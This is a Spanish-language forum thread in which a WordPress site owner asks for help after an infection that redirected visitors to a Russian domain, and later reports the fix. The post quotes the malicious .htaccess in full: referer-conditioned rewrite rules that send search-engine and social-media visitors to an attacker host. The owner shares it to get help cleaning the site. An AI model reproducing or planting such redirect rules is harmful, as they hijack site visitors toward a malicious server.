Virus Wordpress

Hola, no sabia muy bien donde iba este hilo.. asi que si no va aqui, lo siento!.

Bueno tengo un wordpress, y me lo ha infectado alguien. Me redireccion a esta pagina: spbfotomontag.ru/

Lo curioso, es que en el ftp, el unico archivo modificado que veo es el htaccess que ya arregle.. y ayer se arreglo, ya funcionaba perfectamente, pero de repente hoy me he metido y se habia infectado ya del todo, no me deja entrar a ninguna página del blog. Me he metido en la base de datos y en principio tampoco veo nada con esa direccion, aun que tampoco lo he visto al 100% por que la base de datos es muy grande. Pero los archivos .php si que los veo todos correctos.. alguien sabe como podría solucionar esto? habia visto que hay plugins de wordpress para identificar codigo malicioso, pero es que ahora ya no me deja ni entrar al panel, entonces estoy con las manos atadas, muchas gracias! :)

Pega aquí el contenido de tu .htaccess.

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /es/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /es/index.php [L]
</IfModule>


# protege el archivo htaccess
<files .htaccess>
order allow,deny
deny from all
</files>



# END WordPress


Ese es el que tengo ahora despues de limpiarlo.. pero el que me metio el virus era este:

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|mail|yan dex|rambler|ya|aport|linkedin|flickr|nigma|liveint ernet|vkontakte|webalta|filesearch|yell|openstat|m etabot|nol9|zoneru|km|gigablast|entireweb|amfibi|d moz|yippy|search|walhello|webcrawler|jayde|findwha t|teoma|euroseek|wisenut|about|thunderstone|ixquic k|terra|lookle|metaeureka|searchspot|slider|topsev en|allthesites|libero|clickey|galaxy|brainysearch| pocketflier|verygoodsearch|bellnet|freenet|firebal l|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar| suchnase|schnellsuche|sharelook|sucharchiv|suchbie ne|suchmaschine|web-archiv).(.*)

RewriteRule ^(.*)$ http://spbfotomontag.ru:8080/forum/showthread.php?page=beb2436a164c6222 [R=301,L]

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orang e|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|te lfort|hispavista|passagen|spray|eniro|telia|bluewi n|sympatico|nlsearch|atsearch|klammeraffe|shareloo k|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|d affodil|click4choice|exalead|findelio|gasta|gimpsy |globalsearchdirectory|hotfrog|jobrapido|kingdomse ek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan |qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|ex press|bestireland|browseireland|finditireland|iese arch|ireland-information|kompass|startsiden|confex|finnalle|gul esider|keyweb|finnfirma|kvasir|savio|sol|startside n|allpages|america|botw|chapu|claymont|clickz|clus h|ehow|findhow|icq|goo|westaustraliaonline).(.*)

RewriteRule ^(.*)$ http://spbfotomontag.ru:8080/forum/showthread.php?page=beb2436a164c6222 [R=301,L]

</IfModule>


Entonces lo que no entiendo, es como sin modificar la base de datos, ni ningun archivo, puede seguir redireccionandome sin el .htaccess.. :S estoy super perdido y neccesito arreglarlo cuanto antes, google ya ha puesto en los resultados de busqueda mi pagina como peligrosa.. gracias!

Hola, mirar he borrado todos los archivos que habian en el ftp, y sigue apareciendome el mensaje de que la pagina esta infectada. esto ya no puede ser por la página web, ¿el problema que esta en las dns? por que no se me ocurre otra cosa! estoy super perdido, muchas gracias.

Vale, gracias.. ya esta arreglado, por si alguno le pasa lo mismo, era por culpa de google, por que nos habia catálogado como "web peligrosa" por estar infectada. Entonces tuvimos que hacer que google re-analizara la web para que viese que ya no estaba infectada, y al quitar lo de "web peligrosa", los navegadores ya te dejan entrar! :)